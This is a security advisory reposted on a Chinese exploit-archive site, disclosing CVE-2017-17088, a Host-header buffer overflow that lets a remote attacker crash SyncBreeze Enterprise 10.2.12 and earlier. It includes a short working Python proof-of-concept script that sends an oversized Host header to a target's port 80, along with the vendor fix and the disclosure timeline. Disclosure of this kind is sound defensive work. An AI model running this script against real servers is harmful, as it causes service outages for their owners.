首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Sync Breeze 10.2.12 - Denial of Service 来源：vfocus.net 作者：Cardenas 发布时间：2017-12-18   ============================================= MGC ALERT 2017-007 - Original release date: November 30, 2017 - Last revised:  December 14, 2017 - Discovered by: Manuel García Cárdenas - Severity: 7,5/10 (CVSS Base Score) - CVE-ID: CVE-2017-17088 =============================================   I. VULNERABILITY ------------------------- SyncBreeze <= 10.2.12 - Denial of Service   II. BACKGROUND ------------------------- SyncBreeze is a fast, powerful and reliable file synchronization solution for local disks, network shares, NAS storage devices and enterprise storage systems.   III. DESCRIPTION ------------------------- The Enterprise version of SyncBreeze is affected by a Remote Denial of Service vulnerability.   The web server does not check bounds when reading server request in the Host header on making a connection, resulting in a classic Buffer Overflow that causes a Denial of Service.   To exploit the vulnerability only is needed use the version 1.1 of the HTTP protocol to interact with the application.   IV. PROOF OF CONCEPT ------------------------- #!/usr/bin/python import sys, socket   host = sys.argv[1] buffer="GET / HTTP/1.1\r\n" buffer+="Host: "+"A"*2000+"\r\n\r\n"   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, 80)) s.send(buffer) s.close()   V. BUSINESS IMPACT ------------------------- Availability compromise can result from these attacks.   VI. SYSTEMS AFFECTED ------------------------- SyncBreeze <= 10.2.12   VII. SOLUTION ------------------------- Vendor release 10.3 version http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.3.14.exe   VIII. REFERENCES ------------------------- http://www.syncbreeze.com/   IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com).   X. REVISION HISTORY ------------------------- November 30, 2017 1: Initial release December 14, 2017 2: Revision to send to lists   XI. DISCLOSURE TIMELINE ------------------------- November 30, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas November 30, 2017 2: Send to vendor December 6,  2017 3: Vendor fix the vulnerability and release a new version December 14, 2017 4: Send to the Full-Disclosure lists   XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.   XIII. ABOUT ------------------------- Manuel Garcia Cardenas Pentester   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·ITGuard-Manager 0.0.0.1 - Remo ·Linux kernel < 4.10.15 - Race ·Western Digital MyCloud multi_ ·CDex 1.96 - Buffer Overflow ·Microsoft Office DDE Payload D ·Outlook for Android - Attachme ·Dup Scout Enterprise 10.0.18 B ·GoAhead httpd 2.5 < 3.6.5 - 'L ·Advantech WebAccess 8.2 Stack ·Linksys WVBR0 - 'User-Agent' R ·pfSense 2.4.1 CSRF Error Page ·WIndows jscript!JsArraySlice U   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved